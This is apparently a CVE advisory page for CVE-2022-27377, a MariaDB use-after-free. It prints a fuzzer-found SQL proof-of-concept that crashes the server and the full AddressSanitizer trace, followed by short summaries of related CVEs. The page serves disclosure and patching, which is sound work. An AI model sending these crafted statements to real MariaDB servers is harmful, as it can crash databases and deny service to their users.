Headline
CVE-2022-27377: [MDEV-26281] ASAN use-after-poison when complex conversion is involved in blob
MariaDB Server v10.6.3 and below was discovered to contain an use-after-free in the component Item_func_in::cleanup(), which is exploited via specially crafted SQL statements.
CREATE TEMPORARY TABLE v0 ( v2 TINYBLOB AS ( CURRENT_USER IS NULL IS UNKNOWN ) VIRTUAL , v1 TINYINT ZEROFILL , MEDIUM NCHAR BINARY GENERATED ALWAYS AS ( CONVERT ( v1 IN ( FALSE , CURRENT_USER ( ) IS NULL IS NULL , 34 ) , BINARY ( 97015438.000000 ) ) IS NOT UNKNOWN ) ) ;
ALTER TABLE v0 ADD COLUMN v0 MEDIUMINT ZEROFILL KEY UNIQUE COMMENT ‘x’ ;
INSERT IGNORE INTO v0 VALUES ( CONVERT ( ‘x’ LIKE v1 IS UNKNOWN , TIME ) , ‘x’ , v2 IN ( v2 SOUNDS LIKE v1 IS FALSE ) IS UNKNOWN , CONVERT ( ‘x’ REGEXP ‘x’ IS NOT FALSE USING BINARY ) IN ( TRUE LIKE v1 IS NOT UNKNOWN ) ) ;
drop table v0;
===================================================================3652686==ERROR: AddressSanitizer: use-after-poison on address 0x62b00007a760 at pc 0x55b5f9bdde1e bp 0x7f20a06bc570 sp 0x7f20a06bc560
READ of size 8 at 0x62b00007a760 thread T18
#0 0x55b5f9bdde1d in Item\_func\_in::cleanup() /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.h:2566
#1 0x55b5f8b42d30 in Item::delete\_self() /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.h:2514
#2 0x55b5f8b42d30 in Query\_arena::free\_items() /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.cc:3823
#3 0x55b5f908c814 in closefrm(TABLE\*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:4414
#4 0x55b5f93e8b98 in THD::close\_temporary\_table(TABLE\*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/temporary\_tables.cc:1238
#5 0x55b5f93ee75d in THD::drop\_temporary\_table(TABLE\*, bool\*, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/temporary\_tables.cc:660
#6 0x55b5f8f6f876 in mysql\_rm\_table\_no\_locks(THD\*, TABLE\_LIST\*, st\_mysql\_const\_lex\_string const\*, st\_ddl\_log\_state\*, bool, bool, bool, bool, bool, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_table.cc:1298
#7 0x55b5f8f78e7b in mysql\_rm\_table(THD\*, TABLE\_LIST\*, bool, bool, bool, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_table.cc:1044
#8 0x55b5f8ccb268 in mysql\_execute\_command(THD\*, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:4952
#9 0x55b5f8c888dc in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:8028
#10 0x55b5f8cbe2a3 in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1898
#11 0x55b5f8cc3703 in do\_command(THD\*, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1406
#12 0x55b5f918314c in do\_handle\_one\_connection(CONNECT\*, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1410
#13 0x55b5f9184806 in handle\_one\_connection /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1312
#14 0x55b5f9fcfeef in pfs\_spawn\_thread /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201
#15 0x7f20bfcea608 in start\_thread /build/glibc-ZN95T4/glibc-2.31/nptl/pthread\_create.c:477
#16 0x7f20bf8be292 in \_\_clone (/lib/x86\_64-linux-gnu/libc.so.6+0x122292)
0x62b00007a760 is located 13664 bytes inside of 24624-byte region [0x62b000077200,0x62b00007d230)
allocated by thread T18 here:
#0 0x7f20c0275bc8 in malloc (/lib/x86\_64-linux-gnu/libasan.so.5+0x10dbc8)
#1 0x55b5fab5cafc in my\_malloc /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/my\_malloc.c:90
#2 0x55b5fab437a8 in reset\_root\_defaults /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/my\_alloc.c:148
#3 0x55b5f8b36383 in THD::init\_for\_queries() /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.cc:1405
#4 0x55b5f9180d3a in prepare\_new\_connection\_state(THD\*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1240
#5 0x55b5f9181a4a in thd\_prepare\_connection(THD\*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1333
#6 0x55b5f9181a4a in thd\_prepare\_connection(THD\*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1322
#7 0x55b5f91830b2 in do\_handle\_one\_connection(CONNECT\*, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1400
#8 0x55b5f9184806 in handle\_one\_connection /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1312
#9 0x55b5f9fcfeef in pfs\_spawn\_thread /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201
#10 0x7f20bfcea608 in start\_thread /build/glibc-ZN95T4/glibc-2.31/nptl/pthread\_create.c:477
Thread T18 created by T0 here:
#0 0x7f20c01a2805 in pthread\_create (/lib/x86\_64-linux-gnu/libasan.so.5+0x3a805)
#1 0x55b5f9fd01a2 in my\_thread\_create /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/my\_thread.h:48
#2 0x55b5f9fd01a2 in pfs\_spawn\_thread\_v1 /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2252
#3 0x55b5f8958098 in inline\_mysql\_thread\_create /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/include/mysql/psi/mysql\_thread.h:1139
#4 0x55b5f8958098 in create\_thread\_to\_handle\_connection(CONNECT\*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/mysqld.cc:5919
#5 0x55b5f89676b2 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/mysqld.cc:6040
#6 0x55b5f896847e in handle\_connections\_sockets() /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/mysqld.cc:6164
#7 0x55b5f896a60b in mysqld\_main(int, char\*\*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/mysqld.cc:5814
#8 0x7f20bf7c30b2 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: use-after-poison /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item_cmpfunc.h:2566 in Item_func_in::cleanup()
Shadow bytes around the buggy address:
0x0c5680007490: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c56800074a0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c56800074b0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c56800074c0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c56800074d0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
=>0x0c56800074e0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7[f7]f7 f7 f7
0x0c56800074f0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c5680007500: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c5680007510: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c5680007520: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c5680007530: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3652686==ABORTING
Related news
An issue in the component Create_tmp_table::finalize of MariaDB Server v10.7 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.
MariaDB Server v10.6 and below was discovered to contain an use-after-free in the component my_strcasecmp_8bit, which is exploited via specially crafted SQL statements.
MariaDB Server v10.7 and below was discovered to contain a global buffer overflow in the component decimal_bin_size, which is exploited via specially crafted SQL statements.
An issue in the component Used_tables_and_const_cache::used_tables_and_const_cache_join of MariaDB Server v10.7 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.
An issue in the component Item_subselect::init_expr_cache_tracker of MariaDB Server v10.6 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.
An issue in the component Arg_comparator::compare_real_fixed of MariaDB Server v10.6.2 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.
An issue in the component Field::set_default of MariaDB Server v10.6 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.
Subversion's mod_dav_svn is vulnerable to memory corruption. While looking up path-based authorization rules, mod_dav_svn servers may attempt to use memory which has already been freed. Affected Subversion mod_dav_svn servers 1.10.0 through 1.14.1 (inclusive). Servers that do not use mod_dav_svn are not affected.
MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. A security issue was found where an non-admin user is able to create service accounts for root or other admin users and then is able to assume their access policies via the generated credentials. This in turn allows the user to escalate privilege to that of the root user. This vulnerability has been resolved in pull request #14729 and is included in `RELEASE.2022-04-12T06-55-35Z`. Users unable to upgrade may workaround this issue by explicitly adding a `admin:CreateServiceAccount` deny policy, however, this, in turn, denies the user the ability to create their own service accounts as well.
An arbitrary file upload vulnerability in the file upload module of Strapi v4.1.5 allows attackers to execute arbitrary code via a crafted file.
Grafana is an open-source platform for monitoring and observability. When fine-grained access control is enabled and a client uses Grafana API Key to make requests, the permissions for that API Key are cached for 30 seconds for the given organization. Because of the way the cache ID is constructed, the consequent requests with any API Key evaluate to the same permissions as the previous requests. This can lead to an escalation of privileges, when for example a first request is made with Admin permissions, and the second request with different API Key is made with Viewer permissions, the second request will get the cached permissions from the previous Admin, essentially accessing higher privilege than it should. The vulnerability is only impacting Grafana Enterprise when the fine-grained access control beta feature is enabled and there are more than one API Keys in one organization with different roles assigned. All installations after Grafana Enterprise v8.1.0-beta1 should be upgraded ...
An arbitrary file upload vulnerability in the file upload module of Ghost CMS v4.42.0 allows attackers to execute arbitrary code via a crafted file.
An arbitrary file upload vulnerability in the file upload module of PayloadCMS v0.15.0 allows attackers to execute arbitrary code via a crafted SVG file.
A SQL injection issue was discovered in QuerySet.explain() in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. This occurs by passing a crafted dictionary (with dictionary expansion) as the **options argument, and placing the injection payload in an option name.
Nokogiri is an open source XML and HTML library for Ruby. Nokogiri `< v1.13.4` contains an inefficient regular expression that is susceptible to excessive backtracking when attempting to detect encoding in HTML documents. Users are advised to upgrade to Nokogiri `>= 1.13.4`. There are no known workarounds for this issue.
PrivateBin is minimalist, open source online pastebin clone where the server has zero knowledge of pasted data. In PrivateBin < v1.4.0 a cross-site scripting (XSS) vulnerability was found. The vulnerability is present in all versions from v0.21 of the project, which was at the time still called ZeroBin. The issue is caused by the fact that SVGs can contain JavaScript. This can allow an attacker to execute code, if the user opens a paste with a specifically crafted SVG attachment, and interacts with the preview image and the instance isn't protected by an appropriate content security policy. Users are advised to either upgrade to version 1.4.0 or to ensure the content security policy of their instance is set correctly.
GoCD is an open source a continuous delivery server. The bundled gocd-ldap-authentication-plugin included with the GoCD Server fails to correctly escape special characters when using the username to construct LDAP queries. While this does not directly allow arbitrary LDAP data exfiltration, it can allow an existing LDAP-authenticated GoCD user with malicious intent to construct and execute malicious queries, allowing them to deduce facts about other users or entries within the LDAP database (e.g alternate fields, usernames, hashed passwords etc) through brute force mechanisms. This only affects users who have a working LDAP authorization configuration enabled on their GoCD server, and only is exploitable by users authenticating using such an LDAP configuration. This issue has been fixed in GoCD 22.1.0, which is bundled with gocd-ldap-authentication-plugin v2.2.0-144.
Elide is a Java library that lets you stand up a GraphQL/JSON-API web service with minimal effort. When leveraging the following together: Elide Aggregation Data Store for Analytic Queries, Parameterized Columns (A column that requires a client provided parameter), and a parameterized column of type TEXT. There is the potential for a hacker to provide a carefully crafted query that would bypass server side authorization filters through SQL injection. A recent patch to Elide 6.1.2 allowed the '-' character to be included in parameterized TEXT columns. This character can be interpreted as SQL comments ('--') and allow the attacker to remove the WHERE clause from the generated query and bypass authorization filters. A fix is provided in Elide 6.1.4. The vulnerability only exists for parameterized columns of type TEXT and only for analytic queries (CRUD is not impacted). Workarounds include leveraging a different type of parameterized column (TIME, MONEY, etc) or not leveraging parameteriz...
JHipster is a development platform to quickly generate, develop, & deploy modern web applications & microservice architectures. SQL Injection vulnerability in entities for applications generated with the option "reactive with Spring WebFlux" enabled and an SQL database using r2dbc. Applications created without "reactive with Spring WebFlux" and applications with NoSQL databases are not affected. Users who have generated a microservice Gateway using the affected version may be impacted as Gateways are reactive by default. Currently, SQL injection is possible in the findAllBy(Pageable pageable, Criteria criteria) method of an entity repository class generated in these applications as the where clause using Criteria for queries are not sanitized and user input is passed on as it is by the criteria. This issue has been patched in v7.8.1. Users unable to upgrade should be careful when combining criterias and conditions as the root of the issue lies in the `EntityManager.java` class when cre...
Garden is an automation platform for Kubernetes development and testing. In versions prior to 0.12.39 multiple endpoints did not require authentication. In some operating modes this allows for an attacker to gain access to the application erroneously. The configuration is leaked through the /api endpoint on the local server that is responsible for serving the Garden dashboard. At the moment, this server is accessible to 0.0.0.0 which makes it accessible to anyone on the same network (or anyone on the internet if they are on a public, static IP). This may lead to the ability to compromise credentials, secrets or environment variables. Users are advised to upgrade to version 0.12.39 as soon as possible. Users unable to upgrade should use a firewall blocking access to port 9777 from all untrusted network machines.